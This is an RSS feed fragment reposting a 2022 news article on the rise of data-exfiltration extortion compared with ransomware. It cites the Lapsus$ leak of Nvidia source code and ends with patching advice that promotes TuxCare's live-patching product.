</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/etherled-air-gapped-systems-leak-data-via-network-card-leds/" rel="external nofollow">ETHERLED: Air-gapped systems leak data via network card LEDs</a>
</p>
]]></description><guid isPermaLink="false">7887</guid><pubDate>Tue, 23 Aug 2022 22:08:58 +0000</pubDate></item><item><title>The Rise of Data Exfiltration and Why It Is a Greater Risk Than Ransomware</title><link>https://nsaneforums.com/news/security-privacy-news/the-rise-of-data-exfiltration-and-why-it-is-a-greater-risk-than-ransomware-r7883/</link><description><![CDATA[<p>
	Ransomware is the de facto threat organizations have faced over the past few years. Threat actors were making easy money by exploiting the high valuation of cryptocurrencies and their victims' lack of adequate preparation.
</p>

<p>
	<br />
	Think about bad security policies, untested backups, patch management practices not up to par, and so forth. It resulted in easy growth for ransomware extortion, a crime that multiple threat actors around the world perpetrate.
</p>

<p>
	<br />
	Something's changed, though. Crypto valuations have dropped, reducing the monetary appeal of ransomware attacks, and organizations have mounted a formidable defense against ransomware.
</p>

<p>
	<br />
	Threat actors have been searching for another opportunity – and found one. It's called data exfiltration, or exfil, a type of espionage causing headaches at organizations worldwide. Let's take a look.
</p>

<p>
	<br />
	<span style="font-size:18px;"><strong>The threat to reveal confidential information</strong></span>
</p>

<p>
	<br />
	Information exfiltration is rapidly becoming more prevalent. Earlier this year, incidents at Nvidia, Microsoft, and several other companies have highlighted how big of a problem it's become – and how, for some organizations, it may be a threat that's even bigger than ransomware.
</p>

<p>
	<br />
	Nvidia, for example, became entangled in a complex tit-for-tat exchange with hacker group Lapsus$. One of the biggest chipmakers in the world was faced with the public exposure of the source code for invaluable technology, as Lapsus$ leaked the source code for the company's Deep Learning Super Sampling (DLSS) research.
</p>

<p>
	<br />
	When it comes to exfil extortion, attackers do not enter with the primary aim of encrypting a system and causing disruption the way that a ransomware attacker does. Though, yes, attackers may still use encryption to cover their tracks.
</p>

<p>
	<br />
	Instead, attackers on an information exfiltration mission will move vast amounts of proprietary data to systems that they control. And here's the game: attackers will proceed to extort the victim, threatening to release that confidential information into the wild or to sell it to unscrupulous third parties.
</p>

<p>
	<br />
	<span style="font-size:18px;"><strong>Exfil can be far more damaging than ransomware</strong></span>
</p>

<p>
	 
</p>

<p>
	For victims, it's a serious threat because threat actors can acquire the keys to the safe. Competitors can use trade secrets to produce copies of products or to aid their R&amp;D efforts, and leaked information could lead to a costly public relations disaster.
</p>

<p>
	<br />
	Either way – public exposure of information can be a threat greater than ransomware because a ransomware demand can be resolved by paying up (or by restoring backups). Leaked information – well – that's something that may be unfixable. It's easy to see why threat actors can find extortion based on information leakage to be an even more attractive tactic than mere ransomware.
</p>

<p>
	<br />
	It's worth noting that part of the drive for this type of attack also lies in the current state of world affairs, which has created a strong demand for intellectual property transfer across opposing geopolitical lines. There's also arguably greater leniency toward actors attacking "the other side," even when local judicial systems consider the attack a crime.
</p>

<p>
	<br />
	<span style="font-size:18px;"><strong>In for the long haul</strong></span>
</p>

<p>
	 
</p>

<p>
	There's another theme that's emerging in the exfil space. It builds on something that cybersecurity teams have known for a long time: it's beneficial for an attacker to stay undetected for an extended period of time.
</p>

<p>
	<br />
	Staying quiet, rather than flashing "you've been hacked" messages on computer screens, allows attackers to "see" more information flows in the network and to do more in-depth reconnaissance of systems after gaining entry.
</p>

<p>
	<br />
	More time in the network means attackers can identify more desirable targets than a simple ransomware deployment. Patient threat actors could do far more harm if they remain undetected.
</p>

<p>
	<br />
	<span style="font-size:18px;"><strong>Protective measures still work</strong></span>
</p>

<p>
	 
</p>

<p>
	What can organizations do to guard against extortion? Well, the same cybersecurity principles continue to count, even more so given the greater risk.
</p>

<p>
	<br />
	After so many years of alarming headlines, most organizations have deployed ransomware protection in the form of better backup strategies, more fine-tuned and granular data access, and better rules and monitoring for detecting unwanted file changes.
</p>

<p>
	<br />
	It's made ransomware attacks harder, often acting as a deterrent against attackers simply looking for easy targets. Protecting against malware infections or information exfiltration starts with properly maintaining infrastructure.
</p>

<p>
	<br />
	<span style="font-size:18px;"><strong>Seamless patching remains at the core</strong></span>
</p>

<p>
	<br />
	That includes keeping systems up to date with the latest patches. It's not just a guard against ransomware, of course: patched systems also close the easy paths to critical business information, so that threat actors are not in a position to siphon it off.
</p>

<p>
	<br />
	If your organization is still relying on patching operations that involve maintenance windows, it's worth considering whether patching is happening fast enough to protect your organization against information exfiltration threats.
</p>

<p>
	<br />
	Can't patch fast enough? Take a look at live patching. TuxCare's KernelCare Enterprise helps you stay protected against emerging threats immediately, with little lag between threat emergence and mitigation. With one simple, affordable addition to your cybersecurity arsenal, you can put in place the simplest and most important line of defense against attackers looking to hold you for ransom.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2022/08/the-rise-of-data-exfiltration-and-why.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7883</guid><pubDate>Tue, 23 Aug 2022 20:22:23 +0000</pubDate></item></channel></rss>
